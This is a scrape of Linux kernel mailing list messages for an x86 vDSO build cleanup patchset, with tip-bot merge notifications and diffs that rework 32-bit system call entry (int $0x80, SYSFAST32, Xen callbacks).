arch/x86/entry/vdso/.gitignore | 11 +-
arch/x86/entry/vdso/Makefile | 162 +--------------------
arch/x86/entry/vdso/common/Makefile.include | 89 +++++++++++
arch/x86/entry/vdso/{vdso-note.S => common/note.S} | 5 +-
arch/x86/entry/vdso/{ => common}/vclock_gettime.c | 0
arch/x86/entry/vdso/{ => common}/vdso-layout.lds.S | 38 +++--
arch/x86/entry/vdso/{ => common}/vgetcpu.c | 0
arch/x86/entry/vdso/vdso32/Makefile | 24 +++
arch/x86/entry/vdso/vdso32/note.S | 19 +--
arch/x86/entry/vdso/vdso32/sigreturn.S | 152 +++++--------------
arch/x86/entry/vdso/vdso32/system_call.S | 22 ++-
arch/x86/entry/vdso/vdso32/vclock_gettime.c | 5 +-
arch/x86/entry/vdso/vdso32/vdso32.lds.S | 2 +-
arch/x86/entry/vdso/vdso32/vgetcpu.c | 4 +-
arch/x86/entry/vdso/vdso64/Makefile | 46 ++++++
arch/x86/entry/vdso/vdso64/note.S | 1 +
arch/x86/entry/vdso/vdso64/vclock_gettime.c | 1 +
.../entry/vdso/{vdso.lds.S => vdso64/vdso64.lds.S} | 2 +-
arch/x86/entry/vdso/{ => vdso64}/vdsox32.lds.S | 2 +-
arch/x86/entry/vdso/vdso64/vgetcpu.c | 1 +
.../entry/vdso/{ => vdso64}/vgetrandom-chacha.S | 0
arch/x86/entry/vdso/{ => vdso64}/vgetrandom.c | 2 +-
arch/x86/entry/vdso/{ => vdso64}/vsgx.S | 0
arch/x86/entry/vdso/vma.c | 24 ++-
arch/x86/include/asm/cpufeatures.h | 2 +-
arch/x86/include/asm/dwarf2.h | 1 +
arch/x86/include/asm/elf.h | 2 +-
arch/x86/include/asm/vdso.h | 6 +-
arch/x86/include/asm/vdso/gettimeofday.h | 108 +-------------
arch/x86/include/asm/vdso/sys_call.h | 105 +++++++++++++
arch/x86/kernel/asm-offsets.c | 6 +
arch/x86/kernel/cpu/centaur.c | 3 -
arch/x86/kernel/cpu/common.c | 8 +
arch/x86/kernel/cpu/intel.c | 4 +-
arch/x86/kernel/cpu/zhaoxin.c | 4 +-
arch/x86/kernel/fred.c | 2 +-
arch/x86/kernel/process_64.c | 6 +-
arch/x86/kernel/signal_32.c | 4 +-
arch/x86/tools/Makefile | 15 +-
arch/x86/{entry/vdso => tools}/vdso2c.c | 0
arch/x86/{entry/vdso => tools}/vdso2c.h | 0
arch/x86/xen/setup.c | 28 ++--
arch/x86/xen/smp_pv.c | 5 +-
arch/x86/xen/xen-ops.h | 1 -
47 files changed, 444 insertions(+), 490 deletions(-)
|
The following commit has been merged into the x86/entry branch of tip:
Commit-ID: 36d83c249e0395a915144eceeb528ddc19b1fbe6
Gitweb: https://git.kernel.org/tip/36d83c249e0395a915144eceeb528ddc19b1fbe6
Author: H. Peter Anvin <hpa@zytor.com>
AuthorDate: Tue, 16 Dec 2025 13:26:04 -08:00
Committer: Dave Hansen <dave.hansen@linux.intel.com>
CommitterDate: Tue, 13 Jan 2026 16:37:58 -08:00
x86/entry/vdso32: When using int $0x80, use it directly
When neither sysenter32 nor syscall32 is available (on either
FRED-capable 64-bit hardware or old 32-bit hardware), there is no
reason to do a bunch of stack shuffling in __kernel_vsyscall.
Unfortunately, just overwriting the initial "push" instructions will
mess up the CFI annotations, so suffer the 3-byte NOP if not
applicable.
Similarly, inline the int $0x80 when doing inline system calls in the
vdso instead of calling __kernel_vsyscall.
Signed-off-by: H. Peter Anvin (Intel) <hpa@zytor.com>
Signed-off-by: Dave Hansen <dave.hansen@linux.intel.com>
Link: https://patch.msgid.link/20251216212606.1325678-11-hpa@zytor.com
---
arch/x86/entry/vdso/vdso32/system_call.S | 18 ++++++++++++++----
arch/x86/include/asm/vdso/sys_call.h | 4 +++-
2 files changed, 17 insertions(+), 5 deletions(-)
diff --git a/arch/x86/entry/vdso/vdso32/system_call.S b/arch/x86/entry/vdso/vdso32/system_call.S
index 7b1c0f1..9157cf9 100644
--- a/arch/x86/entry/vdso/vdso32/system_call.S
+++ b/arch/x86/entry/vdso/vdso32/system_call.S
@@ -14,6 +14,18 @@
ALIGN
__kernel_vsyscall:
CFI_STARTPROC
+
+ /*
+ * If using int $0x80, there is no reason to muck about with the
+ * stack here. Unfortunately just overwriting the push instructions
+ * would mess up the CFI annotations, but it is only a 3-byte
+ * NOP in that case. This could be avoided by patching the
+ * vdso symbol table (not the code) and entry point, but that
+ * would a fair bit of tooling work or by simply compiling
+ * two different vDSO images, but that doesn't seem worth it.
+ */
+ ALTERNATIVE "int $0x80; ret", "", X86_FEATURE_SYSFAST32
+
/*
* Reshuffle regs so that all of any of the entry instructions
* will preserve enough state.
@@ -52,11 +64,9 @@ __kernel_vsyscall:
#define SYSENTER_SEQUENCE "movl %esp, %ebp; sysenter"
#define SYSCALL_SEQUENCE "movl %ecx, %ebp; syscall"
- /* If SYSENTER (Intel) or SYSCALL32 (AMD) is available, use it. */
- ALTERNATIVE_2 "", SYSENTER_SEQUENCE, X86_FEATURE_SYSFAST32, \
- SYSCALL_SEQUENCE, X86_FEATURE_SYSCALL32
+ ALTERNATIVE SYSENTER_SEQUENCE, SYSCALL_SEQUENCE, X86_FEATURE_SYSCALL32
- /* Enter using int $0x80 */
+ /* Re-enter using int $0x80 */
int $0x80
SYM_INNER_LABEL(int80_landing_pad, SYM_L_GLOBAL)
diff --git a/arch/x86/include/asm/vdso/sys_call.h b/arch/x86/include/asm/vdso/sys_call.h
index dcfd17c..5806b1c 100644
--- a/arch/x86/include/asm/vdso/sys_call.h
+++ b/arch/x86/include/asm/vdso/sys_call.h
@@ -20,7 +20,9 @@
# define __sys_reg4 "r10"
# define __sys_reg5 "r8"
#else
-# define __sys_instr "call __kernel_vsyscall"
+# define __sys_instr ALTERNATIVE("ds;ds;ds;int $0x80", \
+ "call __kernel_vsyscall", \
+ X86_FEATURE_SYSFAST32)
# define __sys_clobber "memory"
# define __sys_nr(x,y) __NR_ ## x ## y
# define __sys_reg1 "ebx"
|
{
"author": "\"tip-bot2 for H. Peter Anvin\" <tip-bot2@linutronix.de>",
"date": "Wed, 14 Jan 2026 00:44:45 -0000",
"thread_id": "vdso-cleanup-patch-4.1@zytor.com.mbox.gz"
}
|
lkml
|
[PATCH v4 00/10] x86/entry/vdso: clean up the vdso build, vdso updates
|
This patchset cleans up the vdso build by building the 32- and 64-bit
vdsos in separate directories, moving the vdso2c tool to
arch/x86/tools, and by merging common code and especially Makefile
rules between the 32- and 64-bit vdsos to the greatest extent
possible.
Be more strict about sanitizing and standardizing the vdso build
options.
Disable CFI for the vdso until the kernel adds user space IBT support.
Modernize the DWARF generation vdso32/sigreturn.S.
Add macros to cleanly call system calls from vdso source code.
Add the GNU_PROPERTY and GNU_STACK PHDRs to the vdso.
When using int $0x80 (old 32-bit hardware or FRED-capable 64-bit
hardware) skip the stack stuff in the 32-bit kernel entry code and
call int $0x80 directly when used from C code.
Changes from v3 to v4:
- Improved description of patch 01/10.
- Split out the move of vdso2c to tools into a separate patch.
- Remove unrelated formatting changes from vdso-layout.lds.S.
- Fix *-x32.o being missing from "targets".
- Rebased onto v6.19-rc1.
Changes from v2 to v3:
In arch/x86/include/asm/vdso/sys_call.h:
- remove stray comment from prototyping (Uros Biszjak)
- remove VDSO_SYSCALL6() since it would require special
handling on 32 bits with frame pointers and is
currently unused. (Uros Biszjak)
- indent nested preprocessor directives.
Changes from v1 to v2:
Too many to count - much of the patchset has been reworked
Patches:
x86/entry/vdso: rename vdso_image_* to vdso*_image
x86/entry/vdso: move vdso2c to arch/x86/tools
x86/entry/vdso: refactor the vdso build
x86/entry/vdso32: don't rely on int80_landing_pad for adjusting ip
x86/entry/vdso32: remove SYSCALL_ENTER_KERNEL macro in sigreturn.S
x86/entry/vdso32: remove open-coded DWARF in sigreturn.S
x86/entry/vdso: include GNU_PROPERTY and GNU_STACK PHDRs
x86/vdso: abstract out vdso system call internals
x86/cpufeature: replace X86_FEATURE_SYSENTER32 with X86_FEATURE_SYSFAST32
x86/entry/vdso32: when using int $0x80, use it directly
---
arch/x86/Kconfig.cpufeatures | 8 +
arch/x86/Makefile | 2 +-
arch/x86/entry/syscall_32.c | 2 +-
arch/x86/entry/vdso/.gitignore | 11 +-
arch/x86/entry/vdso/Makefile | 162 +--------------------
arch/x86/entry/vdso/common/Makefile.include | 89 +++++++++++
arch/x86/entry/vdso/{vdso-note.S => common/note.S} | 5 +-
arch/x86/entry/vdso/{ => common}/vclock_gettime.c | 0
arch/x86/entry/vdso/{ => common}/vdso-layout.lds.S | 38 +++--
arch/x86/entry/vdso/{ => common}/vgetcpu.c | 0
arch/x86/entry/vdso/vdso32/Makefile | 24 +++
arch/x86/entry/vdso/vdso32/note.S | 19 +--
arch/x86/entry/vdso/vdso32/sigreturn.S | 152 +++++--------------
arch/x86/entry/vdso/vdso32/system_call.S | 22 ++-
arch/x86/entry/vdso/vdso32/vclock_gettime.c | 5 +-
arch/x86/entry/vdso/vdso32/vdso32.lds.S | 2 +-
arch/x86/entry/vdso/vdso32/vgetcpu.c | 4 +-
arch/x86/entry/vdso/vdso64/Makefile | 46 ++++++
arch/x86/entry/vdso/vdso64/note.S | 1 +
arch/x86/entry/vdso/vdso64/vclock_gettime.c | 1 +
.../entry/vdso/{vdso.lds.S => vdso64/vdso64.lds.S} | 2 +-
arch/x86/entry/vdso/{ => vdso64}/vdsox32.lds.S | 2 +-
arch/x86/entry/vdso/vdso64/vgetcpu.c | 1 +
.../entry/vdso/{ => vdso64}/vgetrandom-chacha.S | 0
arch/x86/entry/vdso/{ => vdso64}/vgetrandom.c | 2 +-
arch/x86/entry/vdso/{ => vdso64}/vsgx.S | 0
arch/x86/entry/vdso/vma.c | 24 ++-
arch/x86/include/asm/cpufeatures.h | 2 +-
arch/x86/include/asm/dwarf2.h | 1 +
arch/x86/include/asm/elf.h | 2 +-
arch/x86/include/asm/vdso.h | 6 +-
arch/x86/include/asm/vdso/gettimeofday.h | 108 +-------------
arch/x86/include/asm/vdso/sys_call.h | 105 +++++++++++++
arch/x86/kernel/asm-offsets.c | 6 +
arch/x86/kernel/cpu/centaur.c | 3 -
arch/x86/kernel/cpu/common.c | 8 +
arch/x86/kernel/cpu/intel.c | 4 +-
arch/x86/kernel/cpu/zhaoxin.c | 4 +-
arch/x86/kernel/fred.c | 2 +-
arch/x86/kernel/process_64.c | 6 +-
arch/x86/kernel/signal_32.c | 4 +-
arch/x86/tools/Makefile | 15 +-
arch/x86/{entry/vdso => tools}/vdso2c.c | 0
arch/x86/{entry/vdso => tools}/vdso2c.h | 0
arch/x86/xen/setup.c | 28 ++--
arch/x86/xen/smp_pv.c | 5 +-
arch/x86/xen/xen-ops.h | 1 -
47 files changed, 444 insertions(+), 490 deletions(-)
|
The following commit has been merged into the x86/entry branch of tip:
Commit-ID: f49ecf5e110ab0ed255ddea5e321689faf4e50e6
Gitweb: https://git.kernel.org/tip/f49ecf5e110ab0ed255ddea5e321689faf4e50e6
Author: H. Peter Anvin <hpa@zytor.com>
AuthorDate: Tue, 16 Dec 2025 13:26:03 -08:00
Committer: Dave Hansen <dave.hansen@linux.intel.com>
CommitterDate: Tue, 13 Jan 2026 16:37:58 -08:00
x86/cpufeature: Replace X86_FEATURE_SYSENTER32 with X86_FEATURE_SYSFAST32
In most cases, the use of "fast 32-bit system call" depends either on
X86_FEATURE_SEP or X86_FEATURE_SYSENTER32 || X86_FEATURE_SYSCALL32.
However, nearly all the logic for both is identical.
Define X86_FEATURE_SYSFAST32 which indicates that *either* SYSENTER32 or
SYSCALL32 should be used, for either 32- or 64-bit kernels. This
defaults to SYSENTER; use SYSCALL if the SYSCALL32 bit is also set.
As this removes ALL existing uses of X86_FEATURE_SYSENTER32, which is
a kernel-only synthetic feature bit, simply remove it and replace it
with X86_FEATURE_SYSFAST32.
This leaves an unused alternative for a true 32-bit kernel, but that
should really not matter in any way.
The clearing of X86_FEATURE_SYSCALL32 can be removed once the patches
for automatically clearing disabled features has been merged.
Signed-off-by: H. Peter Anvin (Intel) <hpa@zytor.com>
Signed-off-by: Dave Hansen <dave.hansen@linux.intel.com>
Link: https://patch.msgid.link/20251216212606.1325678-10-hpa@zytor.com
---
arch/x86/Kconfig.cpufeatures | 8 +++++++-
arch/x86/entry/vdso/vdso32/system_call.S | 8 +------
arch/x86/include/asm/cpufeatures.h | 2 +-
arch/x86/kernel/cpu/centaur.c | 3 +--
arch/x86/kernel/cpu/common.c | 8 +++++++-
arch/x86/kernel/cpu/intel.c | 4 +---
arch/x86/kernel/cpu/zhaoxin.c | 4 +---
arch/x86/kernel/fred.c | 2 +-
arch/x86/xen/setup.c | 28 ++++++++++++++---------
arch/x86/xen/smp_pv.c | 5 +---
arch/x86/xen/xen-ops.h | 1 +-
11 files changed, 42 insertions(+), 31 deletions(-)
diff --git a/arch/x86/Kconfig.cpufeatures b/arch/x86/Kconfig.cpufeatures
index 733d5af..423ac79 100644
--- a/arch/x86/Kconfig.cpufeatures
+++ b/arch/x86/Kconfig.cpufeatures
@@ -56,6 +56,10 @@ config X86_REQUIRED_FEATURE_MOVBE
def_bool y
depends on MATOM
+config X86_REQUIRED_FEATURE_SYSFAST32
+ def_bool y
+ depends on X86_64 && !X86_FRED
+
config X86_REQUIRED_FEATURE_CPUID
def_bool y
depends on X86_64
@@ -120,6 +124,10 @@ config X86_DISABLED_FEATURE_CENTAUR_MCR
def_bool y
depends on X86_64
+config X86_DISABLED_FEATURE_SYSCALL32
+ def_bool y
+ depends on !X86_64
+
config X86_DISABLED_FEATURE_PCID
def_bool y
depends on !X86_64
diff --git a/arch/x86/entry/vdso/vdso32/system_call.S b/arch/x86/entry/vdso/vdso32/system_call.S
index 2a15634..7b1c0f1 100644
--- a/arch/x86/entry/vdso/vdso32/system_call.S
+++ b/arch/x86/entry/vdso/vdso32/system_call.S
@@ -52,13 +52,9 @@ __kernel_vsyscall:
#define SYSENTER_SEQUENCE "movl %esp, %ebp; sysenter"
#define SYSCALL_SEQUENCE "movl %ecx, %ebp; syscall"
-#ifdef BUILD_VDSO32_64
/* If SYSENTER (Intel) or SYSCALL32 (AMD) is available, use it. */
- ALTERNATIVE_2 "", SYSENTER_SEQUENCE, X86_FEATURE_SYSENTER32, \
- SYSCALL_SEQUENCE, X86_FEATURE_SYSCALL32
-#else
- ALTERNATIVE "", SYSENTER_SEQUENCE, X86_FEATURE_SEP
-#endif
+ ALTERNATIVE_2 "", SYSENTER_SEQUENCE, X86_FEATURE_SYSFAST32, \
+ SYSCALL_SEQUENCE, X86_FEATURE_SYSCALL32
/* Enter using int $0x80 */
int $0x80
diff --git a/arch/x86/include/asm/cpufeatures.h b/arch/x86/include/asm/cpufeatures.h
index c3b53be..63b0f9a 100644
--- a/arch/x86/include/asm/cpufeatures.h
+++ b/arch/x86/include/asm/cpufeatures.h
@@ -84,7 +84,7 @@
#define X86_FEATURE_PEBS ( 3*32+12) /* "pebs" Precise-Event Based Sampling */
#define X86_FEATURE_BTS ( 3*32+13) /* "bts" Branch Trace Store */
#define X86_FEATURE_SYSCALL32 ( 3*32+14) /* syscall in IA32 userspace */
-#define X86_FEATURE_SYSENTER32 ( 3*32+15) /* sysenter in IA32 userspace */
+#define X86_FEATURE_SYSFAST32 ( 3*32+15) /* sysenter/syscall in IA32 userspace */
#define X86_FEATURE_REP_GOOD ( 3*32+16) /* "rep_good" REP microcode works well */
#define X86_FEATURE_AMD_LBR_V2 ( 3*32+17) /* "amd_lbr_v2" AMD Last Branch Record Extension Version 2 */
#define X86_FEATURE_CLEAR_CPU_BUF ( 3*32+18) /* Clear CPU buffers using VERW */
diff --git a/arch/x86/kernel/cpu/centaur.c b/arch/x86/kernel/cpu/centaur.c
index a3b55db..9833f83 100644
--- a/arch/x86/kernel/cpu/centaur.c
+++ b/arch/x86/kernel/cpu/centaur.c
@@ -102,9 +102,6 @@ static void early_init_centaur(struct cpuinfo_x86 *c)
(c->x86 >= 7))
set_cpu_cap(c, X86_FEATURE_CONSTANT_TSC);
-#ifdef CONFIG_X86_64
- set_cpu_cap(c, X86_FEATURE_SYSENTER32);
-#endif
if (c->x86_power & (1 << 8)) {
set_cpu_cap(c, X86_FEATURE_CONSTANT_TSC);
set_cpu_cap(c, X86_FEATURE_NONSTOP_TSC);
diff --git a/arch/x86/kernel/cpu/common.c b/arch/x86/kernel/cpu/common.c
index e7ab22f..1c3261c 100644
--- a/arch/x86/kernel/cpu/common.c
+++ b/arch/x86/kernel/cpu/common.c
@@ -1068,6 +1068,9 @@ void get_cpu_cap(struct cpuinfo_x86 *c)
init_scattered_cpuid_features(c);
init_speculation_control(c);
+ if (IS_ENABLED(CONFIG_X86_64) || cpu_has(c, X86_FEATURE_SEP))
+ set_cpu_cap(c, X86_FEATURE_SYSFAST32);
+
/*
* Clear/Set all flags overridden by options, after probe.
* This needs to happen each time we re-probe, which may happen
@@ -1813,6 +1816,11 @@ static void __init early_identify_cpu(struct cpuinfo_x86 *c)
* that it can't be enabled in 32-bit mode.
*/
setup_clear_cpu_cap(X86_FEATURE_PCID);
+
+ /*
+ * Never use SYSCALL on a 32-bit kernel
+ */
+ setup_clear_cpu_cap(X86_FEATURE_SYSCALL32);
#endif
/*
diff --git a/arch/x86/kernel/cpu/intel.c b/arch/x86/kernel/cpu/intel.c
index 98ae4c3..646ff33 100644
--- a/arch/x86/kernel/cpu/intel.c
+++ b/arch/x86/kernel/cpu/intel.c
@@ -236,9 +236,7 @@ static void early_init_intel(struct cpuinfo_x86 *c)
clear_cpu_cap(c, X86_FEATURE_PSE);
}
-#ifdef CONFIG_X86_64
- set_cpu_cap(c, X86_FEATURE_SYSENTER32);
-#else
+#ifndef CONFIG_X86_64
/* Netburst reports 64 bytes clflush size, but does IO in 128 bytes */
if (c->x86 == 15 && c->x86_cache_alignment == 64)
c->x86_cache_alignment = 128;
diff --git a/arch/x86/kernel/cpu/zhaoxin.c b/arch/x86/kernel/cpu/zhaoxin.c
index 89b1c8a..031379b 100644
--- a/arch/x86/kernel/cpu/zhaoxin.c
+++ b/arch/x86/kernel/cpu/zhaoxin.c
@@ -59,9 +59,7 @@ static void early_init_zhaoxin(struct cpuinfo_x86 *c)
{
if (c->x86 >= 0x6)
set_cpu_cap(c, X86_FEATURE_CONSTANT_TSC);
-#ifdef CONFIG_X86_64
- set_cpu_cap(c, X86_FEATURE_SYSENTER32);
-#endif
+
if (c->x86_power & (1 << 8)) {
set_cpu_cap(c, X86_FEATURE_CONSTANT_TSC);
set_cpu_cap(c, X86_FEATURE_NONSTOP_TSC);
diff --git a/arch/x86/kernel/fred.c b/arch/x86/kernel/fred.c
index 816187d..e736b19 100644
--- a/arch/x86/kernel/fred.c
+++ b/arch/x86/kernel/fred.c
@@ -68,7 +68,7 @@ void cpu_init_fred_exceptions(void)
idt_invalidate();
/* Use int $0x80 for 32-bit system calls in FRED mode */
- setup_clear_cpu_cap(X86_FEATURE_SYSENTER32);
+ setup_clear_cpu_cap(X86_FEATURE_SYSFAST32);
setup_clear_cpu_cap(X86_FEATURE_SYSCALL32);
}
diff --git a/arch/x86/xen/setup.c b/arch/x86/xen/setup.c
index 3823e52..ac8021c 100644
--- a/arch/x86/xen/setup.c
+++ b/arch/x86/xen/setup.c
@@ -990,13 +990,6 @@ static int register_callback(unsigned type, const void *func)
return HYPERVISOR_callback_op(CALLBACKOP_register, &callback);
}
-void xen_enable_sysenter(void)
-{
- if (cpu_feature_enabled(X86_FEATURE_SYSENTER32) &&
- register_callback(CALLBACKTYPE_sysenter, xen_entry_SYSENTER_compat))
- setup_clear_cpu_cap(X86_FEATURE_SYSENTER32);
-}
-
void xen_enable_syscall(void)
{
int ret;
@@ -1008,11 +1001,27 @@ void xen_enable_syscall(void)
mechanism for syscalls. */
}
- if (cpu_feature_enabled(X86_FEATURE_SYSCALL32) &&
- register_callback(CALLBACKTYPE_syscall32, xen_entry_SYSCALL_compat))
+ if (!cpu_feature_enabled(X86_FEATURE_SYSFAST32))
+ return;
+
+ if (cpu_feature_enabled(X86_FEATURE_SYSCALL32)) {
+ /* Use SYSCALL32 */
+ ret = register_callback(CALLBACKTYPE_syscall32,
+ xen_entry_SYSCALL_compat);
+
+ } else {
+ /* Use SYSENTER32 */
+ ret = register_callback(CALLBACKTYPE_sysenter,
+ xen_entry_SYSENTER_compat);
+ }
+
+ if (ret) {
setup_clear_cpu_cap(X86_FEATURE_SYSCALL32);
+ setup_clear_cpu_cap(X86_FEATURE_SYSFAST32);
+ }
}
+
static void __init xen_pvmmu_arch_setup(void)
{
HYPERVISOR_vm_assist(VMASST_CMD_enable, VMASST_TYPE_writable_pagetables);
@@ -1022,7 +1031,6 @@ static void __init xen_pvmmu_arch_setup(void)
register_callback(CALLBACKTYPE_failsafe, xen_failsafe_callback))
BUG();
- xen_enable_sysenter();
xen_enable_syscall();
}
diff --git a/arch/x86/xen/smp_pv.c b/arch/x86/xen/smp_pv.c
index 9bb8ff8..c40f326 100644
--- a/arch/x86/xen/smp_pv.c
+++ b/arch/x86/xen/smp_pv.c
@@ -65,10 +65,9 @@ static void cpu_bringup(void)
touch_softlockup_watchdog();
/* PVH runs in ring 0 and allows us to do native syscalls. Yay! */
- if (!xen_feature(XENFEAT_supervisor_mode_kernel)) {
- xen_enable_sysenter();
+ if (!xen_feature(XENFEAT_supervisor_mode_kernel))
xen_enable_syscall();
- }
+
cpu = smp_processor_id();
identify_secondary_cpu(cpu);
set_cpu_sibling_map(cpu);
diff --git a/arch/x86/xen/xen-ops.h b/arch/x86/xen/xen-ops.h
index 090349b..f6c331b 100644
--- a/arch/x86/xen/xen-ops.h
+++ b/arch/x86/xen/xen-ops.h
@@ -60,7 +60,6 @@ phys_addr_t __init xen_find_free_area(phys_addr_t size);
char * __init xen_memory_setup(void);
void __init xen_arch_setup(void);
void xen_banner(void);
-void xen_enable_sysenter(void);
void xen_enable_syscall(void);
void xen_vcpu_restore(void);
|
{
"author": "\"tip-bot2 for H. Peter Anvin\" <tip-bot2@linutronix.de>",
"date": "Wed, 14 Jan 2026 00:44:49 -0000",
"thread_id": "vdso-cleanup-patch-4.1@zytor.com.mbox.gz"
}
|
lkml
|
[PATCH v4 00/10] x86/entry/vdso: clean up the vdso build, vdso updates
|
This patchset cleans up the vdso build by building the 32- and 64-bit
vdsos in separate directories, moving the vdso2c tool to
arch/x86/tools, and by merging common code and especially Makefile
rules between the 32- and 64-bit vdsos to the greatest extent
possible.
Be more strict about sanitizing and standardizing the vdso build
options.
Disable CFI for the vdso until the kernel adds user space IBT support.
Modernize the DWARF generation vdso32/sigreturn.S.
Add macros to cleanly call system calls from vdso source code.
Add the GNU_PROPERTY and GNU_STACK PHDRs to the vdso.
When using int $0x80 (old 32-bit hardware or FRED-capable 64-bit
hardware) skip the stack stuff in the 32-bit kernel entry code and
call int $0x80 directly when used from C code.
Changes from v3 to v4:
- Improved description of patch 01/10.
- Split out the move of vdso2c to tools into a separate patch.
- Remove unrelated formatting changes from vdso-layout.lds.S.
- Fix *-x32.o being missing from "targets".
- Rebased onto v6.19-rc1.
Changes from v2 to v3:
In arch/x86/include/asm/vdso/sys_call.h:
- remove stray comment from prototyping (Uros Biszjak)
- remove VDSO_SYSCALL6() since it would require special
handling on 32 bits with frame pointers and is
currently unused. (Uros Biszjak)
- indent nested preprocessor directives.
Changes from v1 to v2:
Too many to count - much of the patchset has been reworked
Patches:
x86/entry/vdso: rename vdso_image_* to vdso*_image
x86/entry/vdso: move vdso2c to arch/x86/tools
x86/entry/vdso: refactor the vdso build
x86/entry/vdso32: don't rely on int80_landing_pad for adjusting ip
x86/entry/vdso32: remove SYSCALL_ENTER_KERNEL macro in sigreturn.S
x86/entry/vdso32: remove open-coded DWARF in sigreturn.S
x86/entry/vdso: include GNU_PROPERTY and GNU_STACK PHDRs
x86/vdso: abstract out vdso system call internals
x86/cpufeature: replace X86_FEATURE_SYSENTER32 with X86_FEATURE_SYSFAST32
x86/entry/vdso32: when using int $0x80, use it directly
---
arch/x86/Kconfig.cpufeatures | 8 +
arch/x86/Makefile | 2 +-
arch/x86/entry/syscall_32.c | 2 +-
arch/x86/entry/vdso/.gitignore | 11 +-
arch/x86/entry/vdso/Makefile | 162 +--------------------
arch/x86/entry/vdso/common/Makefile.include | 89 +++++++++++
arch/x86/entry/vdso/{vdso-note.S => common/note.S} | 5 +-
arch/x86/entry/vdso/{ => common}/vclock_gettime.c | 0
arch/x86/entry/vdso/{ => common}/vdso-layout.lds.S | 38 +++--
arch/x86/entry/vdso/{ => common}/vgetcpu.c | 0
arch/x86/entry/vdso/vdso32/Makefile | 24 +++
arch/x86/entry/vdso/vdso32/note.S | 19 +--
arch/x86/entry/vdso/vdso32/sigreturn.S | 152 +++++--------------
arch/x86/entry/vdso/vdso32/system_call.S | 22 ++-
arch/x86/entry/vdso/vdso32/vclock_gettime.c | 5 +-
arch/x86/entry/vdso/vdso32/vdso32.lds.S | 2 +-
arch/x86/entry/vdso/vdso32/vgetcpu.c | 4 +-
arch/x86/entry/vdso/vdso64/Makefile | 46 ++++++
arch/x86/entry/vdso/vdso64/note.S | 1 +
arch/x86/entry/vdso/vdso64/vclock_gettime.c | 1 +
.../entry/vdso/{vdso.lds.S => vdso64/vdso64.lds.S} | 2 +-
arch/x86/entry/vdso/{ => vdso64}/vdsox32.lds.S | 2 +-
arch/x86/entry/vdso/vdso64/vgetcpu.c | 1 +
.../entry/vdso/{ => vdso64}/vgetrandom-chacha.S | 0
arch/x86/entry/vdso/{ => vdso64}/vgetrandom.c | 2 +-
arch/x86/entry/vdso/{ => vdso64}/vsgx.S | 0
arch/x86/entry/vdso/vma.c | 24 ++-
arch/x86/include/asm/cpufeatures.h | 2 +-
arch/x86/include/asm/dwarf2.h | 1 +
arch/x86/include/asm/elf.h | 2 +-
arch/x86/include/asm/vdso.h | 6 +-
arch/x86/include/asm/vdso/gettimeofday.h | 108 +-------------
arch/x86/include/asm/vdso/sys_call.h | 105 +++++++++++++
arch/x86/kernel/asm-offsets.c | 6 +
arch/x86/kernel/cpu/centaur.c | 3 -
arch/x86/kernel/cpu/common.c | 8 +
arch/x86/kernel/cpu/intel.c | 4 +-
arch/x86/kernel/cpu/zhaoxin.c | 4 +-
arch/x86/kernel/fred.c | 2 +-
arch/x86/kernel/process_64.c | 6 +-
arch/x86/kernel/signal_32.c | 4 +-
arch/x86/tools/Makefile | 15 +-
arch/x86/{entry/vdso => tools}/vdso2c.c | 0
arch/x86/{entry/vdso => tools}/vdso2c.h | 0
arch/x86/xen/setup.c | 28 ++--
arch/x86/xen/smp_pv.c | 5 +-
arch/x86/xen/xen-ops.h | 1 -
47 files changed, 444 insertions(+), 490 deletions(-)
|
The following commit has been merged into the x86/entry branch of tip:
Commit-ID: 98d3e996513ad00b7824ea3bece506fc645547dd
Gitweb: https://git.kernel.org/tip/98d3e996513ad00b7824ea3bece506fc645547dd
Author: H. Peter Anvin <hpa@zytor.com>
AuthorDate: Tue, 16 Dec 2025 13:25:59 -08:00
Committer: Dave Hansen <dave.hansen@linux.intel.com>
CommitterDate: Tue, 13 Jan 2026 16:37:58 -08:00
x86/entry/vdso32: Remove SYSCALL_ENTER_KERNEL macro in sigreturn.S
A macro SYSCALL_ENTER_KERNEL was defined in sigreturn.S, with the
ability of overriding it. The override capability, however, is not
used anywhere, and the macro name is potentially confusing because it
seems to imply that sysenter/syscall could be used here, which is NOT
true: the sigreturn system calls MUST use int $0x80.
Signed-off-by: H. Peter Anvin (Intel) <hpa@zytor.com>
Signed-off-by: Dave Hansen <dave.hansen@linux.intel.com>
Link: https://patch.msgid.link/20251216212606.1325678-6-hpa@zytor.com
---
arch/x86/entry/vdso/vdso32/sigreturn.S | 8 ++------
1 file changed, 2 insertions(+), 6 deletions(-)
diff --git a/arch/x86/entry/vdso/vdso32/sigreturn.S b/arch/x86/entry/vdso/vdso32/sigreturn.S
index 1bd068f..965900c 100644
--- a/arch/x86/entry/vdso/vdso32/sigreturn.S
+++ b/arch/x86/entry/vdso/vdso32/sigreturn.S
@@ -3,10 +3,6 @@
#include <asm/unistd_32.h>
#include <asm/asm-offsets.h>
-#ifndef SYSCALL_ENTER_KERNEL
-#define SYSCALL_ENTER_KERNEL int $0x80
-#endif
-
.text
.globl __kernel_sigreturn
.type __kernel_sigreturn,@function
@@ -16,7 +12,7 @@ __kernel_sigreturn:
.LSTART_sigreturn:
popl %eax /* XXX does this mean it needs unwind info? */
movl $__NR_sigreturn, %eax
- SYSCALL_ENTER_KERNEL
+ int $0x80
.LEND_sigreturn:
SYM_INNER_LABEL(vdso32_sigreturn_landing_pad, SYM_L_GLOBAL)
nop
@@ -28,7 +24,7 @@ SYM_INNER_LABEL(vdso32_sigreturn_landing_pad, SYM_L_GLOBAL)
__kernel_rt_sigreturn:
.LSTART_rt_sigreturn:
movl $__NR_rt_sigreturn, %eax
- SYSCALL_ENTER_KERNEL
+ int $0x80
.LEND_rt_sigreturn:
SYM_INNER_LABEL(vdso32_rt_sigreturn_landing_pad, SYM_L_GLOBAL)
nop
|
{
"author": "\"tip-bot2 for H. Peter Anvin\" <tip-bot2@linutronix.de>",
"date": "Wed, 14 Jan 2026 00:44:54 -0000",
"thread_id": "vdso-cleanup-patch-4.1@zytor.com.mbox.gz"
}
|
lkml
|
[PATCH v4 00/10] x86/entry/vdso: clean up the vdso build, vdso updates
|
This patchset cleans up the vdso build by building the 32- and 64-bit
vdsos in separate directories, moving the vdso2c tool to
arch/x86/tools, and by merging common code and especially Makefile
rules between the 32- and 64-bit vdsos to the greatest extent
possible.
Be more strict about sanitizing and standardizing the vdso build
options.
Disable CFI for the vdso until the kernel adds user space IBT support.
Modernize the DWARF generation vdso32/sigreturn.S.
Add macros to cleanly call system calls from vdso source code.
